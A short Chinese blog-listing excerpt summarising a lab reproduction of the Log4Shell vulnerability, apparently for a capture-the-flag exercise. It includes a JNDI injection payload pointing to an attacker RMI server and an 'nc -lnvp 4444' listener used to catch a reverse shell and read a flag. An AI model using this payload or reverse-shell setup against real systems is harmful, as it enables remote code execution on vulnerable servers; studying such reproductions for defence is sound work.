- 博客(2)
- 收藏
- 关注
原创 Log4Shell漏洞复现
服务器搭建完成后,复制其中的rmi远程代码执行网址并替换到burpsuie的payload=${jndi:rmi://192.168.153.133:1099/qkey18}中,其中qkey18为脚本地址,然后再打开一个终端输入nc -lnvp 4444进行监听,再使用burpsuit发送数据包,JNDI就会反弹shell给攻击机,然后就可以获取到flag(flag一般在/tmp目录下)。(本人这里使用的是jdk17,因其封装性遇到了诸多问题,如果使用jdk8,代码会相对简单些)的base64编码形式。
2025-03-21 12:08:45
358
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人